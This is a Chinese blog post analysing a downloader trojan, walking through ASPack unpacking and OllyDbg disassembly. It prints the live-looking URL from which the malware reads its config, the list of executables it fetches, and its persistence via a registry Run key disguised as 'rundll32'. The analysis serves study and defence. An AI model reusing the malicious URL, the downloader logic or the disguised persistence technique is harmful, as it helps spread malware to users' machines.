分析个下载者形式的木马
混世魔王 http://26836659.blogcn.com
ASPack 2.12 -> Alexey Solodovnikov
0041E001 > 60 PUSHAD //入口代码
0041E002 E8 03000000 CALL randll32.0041E00A //F8到此 HR ESP F9运行
0041E007 – E9 EB045D45 JMP 459EE4F7
0041E00C 55 PUSH EBP
0041E00D C3 RETN
0041E3B0 /75 08 JNZ SHORT randll32.0041E3BA //F9 运行来到这里
0041E3B2 |B8 01000000 MOV EAX,1
0041E3B7 |C2 0C00 RETN 0C
0041E3BA \68 BC494100 PUSH randll32.004149BC //F8下到这里
0041E3BF C3 RETN
004149BC 55 PUSH EBP //OEP
004149BD 8BEC MOV EBP,ESP
004149BF B9 04000000 MOV ECX,4
004149C4 6A 00 PUSH 0
004149C6 6A 00 PUSH 0
004149C8 49 DEC ECX
到OEP=149BC DOWN 出来,Import修复一下。Delphi写的。
重新OD 载入脱壳后程序。文件才140多K,很小,借助字符的帮助简单分析了一下。
00413F37 . 55 PUSH EBP
00413F38 . 68 6B414100 PUSH randll_.0041416B
00413F3D . 64:FF30 PUSH DWORD PTR FS:[EAX]
00413F40 . 64:8920 MOV DWORD PTR FS:[EAX],ESP
00413F43 . 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
00413F46 . BA B4414100 MOV EDX,randll_.004141B4 ;
http://www.yeacool.net/updatenew/updatetl.txt
程序运行后会访问这个URL,读取信息。
00413F4B . E8 ECFDFEFF CALL randll_.00403D3C
00413F50 . 8D45 DC LEA EAX,DWORD PTR SS:[EBP-24]
00413F53 . E8 84070000 CALL randll_.004146DC
00413F58 . 8B55 DC MOV EDX,DWORD PTR SS:[EBP-24]
00413F5B . 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8]
00413F5E . B9 EC414100 MOV ECX,randll_.004141EC ;
update.ini 读取完后,会生成一个update.ini文件保存读取的信息
00413F63 . E8 2400FFFF CALL randll_.00403F8C
00413F68 . 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
00413F6B . E8 A032FFFF CALL randll_.00407210
00413F70 . 84C0 TEST AL,AL
00413F72 . 74 08 JE SHORT randll_.00413F7C
00413F74 . 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
00413F77 . E8 A432FFFF CALL randll_.00407220
00413F7C > 8B55 F8 MOV EDX,DWORD PTR SS:[EBP-8]
00413F7F . 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00413F82 . E8 85070000 CALL randll_.0041470C
00413F87 . 84C0 TEST AL,AL
00413F89 . 75 0D JNZ SHORT randll_.00413F98
00413F8B . 33C0 XOR EAX,EAX
00413F8D . 5A POP EDX
00413F8E . 59 POP ECX
00413F8F . 59 POP ECX
00413F90 . 64:8910 MOV DWORD PTR FS:[EAX],EDX
00413F93 . E9 DD010000 JMP randll_.00414175
00413F98 > 8B4D F8 MOV ECX,DWORD PTR SS:[EBP-8]
00413F9B . B2 01 MOV DL,1
00413F9D . A1 B82B4100 MOV EAX,DWORD PTR DS:[412BB8]
00413FA2 . E8 C1ECFFFF CALL randll_.00412C68
00413FA7 . 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX
00413FAA . 6A 00 PUSH 0
00413FAC . 8D45 D8 LEA EAX,DWORD PTR SS:[EBP-28]
00413FAF . 50 PUSH EAX
00413FB0 . B9 00424100 MOV ECX,randll_.00414200 ; filelist
00413FB5 . BA 14424100 MOV EDX,randll_.00414214 ; settings
00413FBA . 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C]
00413FBD . 8B18 MOV EBX,DWORD PTR DS:[EAX]
00413FBF . FF13 CALL DWORD PTR DS:[EBX]
00413FC1 . 8B45 D8 MOV EAX,DWORD PTR SS:[EBP-28]
filelist 和 settings 看下updatetl.txt里面的内容就很清楚了。
updatetl.txt内容为:
[settings]
filelist=iplus0417.exe,0,1;wd2_051117_WIS207_mini.exe,0,1;all0417.exe,0,1;0112_
9.exe,0,1;194026.exe,0,1;s28979.exe,0,1;Kuaiso.exe,0,1;01YYAZ01.exe,0,1;dsogou0
415.exe,0,1;pcast207.exe,0,1;
0041428B |. E8 C0F9FFFF CALL randll_.00413C50
00414290 |. 33C9 XOR ECX,ECX
00414292 |. BA E4424100 MOV EDX,randll_.004142E4 ;
\software\microsoft\windows\currentversion\run
写注册表启动项目
00414297 |. 8BC3 MOV EAX,EBX
00414299 |. E8 16FAFFFF CALL randll_.00413CB4
0041429E |. 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]
004142A1 |. BA 1C434100 MOV EDX,randll_.0041431C ;
rundll32 键值为 rundll32
004142A6 |. 8BC3 MOV EAX,EBX
00414364 |. BA FC434100 MOV EDX,randll_.004143FC ;
rundll32.ini
00414369 |. E8 DAFBFEFF CALL randll_.00403F48
0041436E |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
00414371 |. B2 01 MOV DL,1
00414373 |. A1 B82B4100 MOV EAX,DWORD PTR DS:[412BB8]
00414378 |. E8 EBE8FFFF CALL randll_.00412C68
0041437D |. 8BD8 MOV EBX,EAX
0041437F |. 6A 00 PUSH 0
00414381 |. 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8]
00414384 |. 50 PUSH EAX
00414385 |. B9 14444100 MOV ECX,randll_.00414414 ; ASCII “hasdown”
0041438A |. BA 24444100 MOV EDX,randll_.00414424 ; ASCII “settings”
保存为rundll32.ini 和写入内容hasdown 和 settings 设置
00414681 |. 8BD8 MOV EBX,EAX
00414683 |. 68 FF000000 PUSH 0FF ; /BufSize = FF (255.)
00414688 |. 53 PUSH EBX ; |Buffer
00414689 |. E8 0A14FFFF CALL <JMP.&kernel32.GetSystemDirectoryA> ; \GetSystemDirectoryA
GetSystemDirectoryA获得系统目录
004146EC |. 53 PUSH EBX ; /Buffer
004146ED |. 68 FF000000 PUSH 0FF ; |BufSize = FF (255.)
004146F2 |. E8 A913FFFF CALL <JMP.&kernel32.GetTempPathA> ; \GetTempPathA
gettemppatha 得到的路径
004147ED |. 68 C0484100 PUSH randll_.004148C0 ; /pModule = “kernel32”
004147F2 |. E8 7912FFFF CALL <JMP.&kernel32.GetModuleHandleA> ; \GetModuleHandleA
GetModuleHandleA 获取一个应用程序或动态链接库的模块句柄
004147F7 |. 8985 F0FEFFFF MOV DWORD PTR SS:[EBP-110],EAX
004147FD |. 83BD F0FEFFFF>CMP DWORD PTR SS:[EBP-110],0
00414804 |. 74 47 JE SHORT randll_.0041484D
00414806 |. 68 CC484100 PUSH randll_.004148CC ; /ProcNameOrOrdinal = “ExitProcess” ExitProcess 以干净的方式关闭一个进程
0041480B |. 8B85 F0FEFFFF MOV EAX,DWORD PTR SS:[EBP-110] ; |
00414811 |. 50 PUSH EAX ; |hModule
00414812 |. E8 6912FFFF CALL <JMP.&kernel32.GetProcAddress> ; \GetProcAddress
00414817 |. 8985 F4FEFFFF MOV DWORD PTR SS:[EBP-10C],EAX
0041481D |. 68 D8484100 PUSH randll_.004148D8 ; /ProcNameOrOrdinal = “DeleteFileA” DeleteFileA 删除指定文件
00414822 |. 8B85 F0FEFFFF MOV EAX,DWORD PTR SS:[EBP-110] ; |
00414828 |. 50 PUSH EAX ; |hModule
00414829 |. E8 5212FFFF CALL <JMP.&kernel32.GetProcAddress> ; \GetProcAddress
0041482E |. 8985 ECFEFFFF MOV DWORD PTR SS:[EBP-114],EAX
00414834 |. 68 E4484100 PUSH randll_.004148E4 ; /ProcNameOrOrdinal = “UnmapViewOfFile”
00414839 |. 8B85 F0FEFFFF MOV EAX,DWORD PTR SS:[EBP-110] ; |
0041483F |. 50 PUSH EAX ; |hModule
00414840 |. E8 3B12FFFF CALL <JMP.&kernel32.GetProcAddress> ; \GetProcAddress
总结:
一个典型下载者,从http://www.yeacool.net/updatenew/updatetl.txt读取配置,并且下载同级目录下的iplus0417.exe wd2_051117_WIS207_mini.exe all0417.exe 0112_9.exe 等.流氓软件或木马软件。
程序自身写注册表启动项(\software\microsoft\windows\currentversion\run),键值为 rundll32。在非系统目录下运行会复制自身到系统文件下。并删除原来运行程序。在进程中可以看到rundll32的进程。
混世魔王-天使投资人的技术博客
Categories
- 百度黑帽SEO (19)
- 程序破解 (12)
- 代码相关 (16)
- 服务器搭建与维护 (6)
- 付费研究项目 (10)
- 黑客产业 (3)
- 黑客入侵方面 (18)
- 黑帽软件 (3)
- 乱七八糟 (54)
- 魔中医 (3)
- 木马病毒 (3)
- 泡妞与心理学研究 (3)
- 书籍作品 (9)
- 刷库作弊研究 (5)
- 搜索引擎算法研究 (2)
- 天使投资 (3)
- 投资理财 (1)
- 网络文摘 (81)
- 心情乱笔 (8)
- 英文站外链资源 (3)
- 英文站SEO (14)
- Cookie Stuffing (18)
- DDOS攻击 (1)
- Google Search Appliance (1)
- Google黑帽SEO (6)
- linux提权 (2)
- Mobile Buy (1)
- wordpress (7)
- xss跨站攻击 (2)
Blog Archive
博客归档
Hashtag
Comments
由 Blogger 提供支持.
Search This Blog
Tags
Footer Menu Widget
没有评论:
发表评论